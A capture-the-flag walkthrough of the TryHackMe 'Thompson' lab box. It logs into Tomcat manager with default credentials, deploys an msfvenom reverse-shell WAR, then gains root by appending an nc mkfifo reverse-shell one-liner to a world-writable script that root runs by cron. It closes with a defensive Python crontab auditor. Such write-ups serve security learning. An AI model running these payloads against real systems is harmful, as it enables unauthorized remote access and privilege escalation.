THM: Thompson
Introduction
boot2root machine for FIT and bsides guatemala CTF
This is Thompson from THM. It’s the last one of the BSides Guatemala boxes. This one took me 13 minutes. I’m on a roll.
Ports
SSH, and an HTTP proxy on port 8080. The page served there shows the Tomcat logo, so it’s probably Tomcat, yes?
8080
So, let’s try some default credentials for the manager app:
tomcat:tomcat - no
tomcat:s3cret - yes
That was easy. Okay, so now we need a WAR file to deploy through the manager:
root@kali:/opt/tryhackme/bsidesthompson# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.10.123 LPORT=1234 -f war > shell.war
Payload size: 1095 bytes
Final size of war file: 1095 bytes
root@kali:/opt/tryhackme/bsidesthompson# nc -nvlp 1234
We are on.
Privesc
Let’s look around:
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.167.40] 52118
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash");'
tomcat@ubuntu:/$ cd /home
cd /home
tomcat@ubuntu:/home$ ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Aug 14 2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 14 2019 ..
4.0K drwxr-xr-x 4 jack jack 4.0K Aug 23 2019 jack
tomcat@ubuntu:/home$ cd jack
cd jack
tomcat@ubuntu:/home/jack$ ls -lash
ls -lash
total 48K
4.0K drwxr-xr-x 4 jack jack 4.0K Aug 23 2019 .
4.0K drwxr-xr-x 3 root root 4.0K Aug 14 2019 ..
4.0K -rw------- 1 root root 1.5K Aug 14 2019 .bash_history
4.0K -rw-r--r-- 1 jack jack 220 Aug 14 2019 .bash_logout
4.0K -rw-r--r-- 1 jack jack 3.7K Aug 14 2019 .bashrc
4.0K drwx------ 2 jack jack 4.0K Aug 14 2019 .cache
4.0K -rwxrwxrwx 1 jack jack 26 Aug 14 2019 id.sh
4.0K drwxrwxr-x 2 jack jack 4.0K Aug 14 2019 .nano
4.0K -rw-r--r-- 1 jack jack 655 Aug 14 2019 .profile
0 -rw-r--r-- 1 jack jack 0 Aug 14 2019 .sudo_as_admin_successful
4.0K -rw-r--r-- 1 root root 39 Jan 3 00:59 test.txt
4.0K -rw-rw-r-- 1 jack jack 33 Aug 14 2019 user.txt
4.0K -rw-r--r-- 1 root root 183 Aug 14 2019 .wget-hsts
tomcat@ubuntu:/home/jack$ cat user.txt
cat user.txt
39400c90bc683a41a8935e4719f181bf
tomcat@ubuntu:/home/jack$ cat test.txt
cat test.txt
uid=0(root) gid=0(root) groups=0(root)
tomcat@ubuntu:/home/jack$ file id.sh
file id.sh
id.sh: Bourne-Again shell script, ASCII text executable
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
tomcat@ubuntu:/home/jack$ ./id.sh
./id.sh
./id.sh: line 2: test.txt: Permission denied
Okay, so we have one user, jack, with a world-writable shell script that fails when we run it (test.txt is owned by root) but which has evidently been run by root, since test.txt contains root’s id output. Hmmm. Let’s check the crontab:
tomcat@ubuntu:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the 'crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root cd /home/jack && bash id.sh
#
tomcat@ubuntu:/$ cd /home/jack
So there it is: a cron job running every minute as root and executing jack’s world-writable script. We’ll append a reverse shell one-liner to it and start a new listener:
tomcat@ubuntu:/home/jack$ printf 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1235 >/tmp/f\n' >> id.sh
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1235 >/tmp/f
Great, let’s check our listener:
root@kali:/opt/tryhackme/bsidesthompson# nc -nvlp 1235
listening on [any] 1235 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.167.40] 35420
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -lash
total 24K
4.0K drwx------ 3 root root 4.0K Aug 14 2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 14 2019 ..
4.0K -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
4.0K drwxr-xr-x 2 root root 4.0K Aug 14 2019 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 33 Aug 14 2019 root.txt
# cat root.txt
d89d5391984c0450a95497153ae7ca3a
And another one done.
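The root cause on this box, a root cron job executing a script that a non-root user can edit, is easy to catch in a routine audit. As an added example (not from the original writeup), here is a small Python checker that parses a system crontab in /etc/crontab format (with the user field), resolves the `cd DIR && bash script` idiom seen above, and flags root jobs whose target is world-writable or owned by a non-root uid. The sample crontab and the file ownerships are constructed, and the `lookup` parameter is an assumption that lets the audit run offline.

```python
import os
import stat
from typing import Callable, List, Optional, Tuple

# Constructed sample: the relevant lines of the box's /etc/crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /home/jack && bash id.sh
"""

# Commands whose first non-option argument is the thing actually executed.
WRAPPERS = {"bash", "sh", "dash", "python", "python3", "perl", "run-parts"}

def script_path(command: str) -> str:
    """Resolve the file a system-crontab command runs, honouring a leading
    'cd DIR &&' and interpreter/wrapper invocations (e.g. 'bash id.sh')."""
    cwd = "/"
    segments = [s.strip() for s in command.split("&&")]
    for seg in segments[:-1]:
        parts = seg.split()
        if len(parts) == 2 and parts[0] == "cd":
            cwd = parts[1]
    tokens = segments[-1].split()
    target = tokens[0]
    if os.path.basename(target) in WRAPPERS and len(tokens) > 1:
        target = next((t for t in tokens[1:] if not t.startswith("-")), target)
    return os.path.normpath(os.path.join(cwd, target))

def default_lookup(path: str) -> Optional[Tuple[int, int]]:
    """Return (owner uid, permission bits) for a real file, or None if absent."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, stat.S_IMODE(st.st_mode)

def audit_crontab(text: str, lookup: Callable[[str], Optional[Tuple[int, int]]]
                  = default_lookup) -> List[Tuple[str, str]]:
    """Return (path, reason) for root jobs whose target a non-root user could edit."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[5] != "root":
            continue  # malformed/@reboot-style line, or not running as root
        path = script_path(fields[6])
        info = lookup(path)
        if info is None:
            continue
        uid, mode = info
        if mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        elif uid != 0:
            findings.append((path, f"owned by uid {uid}"))
    return findings
```

Run against the live /etc/crontab with the default lookup; /etc/cron.d files use the same format and can be fed in the same way.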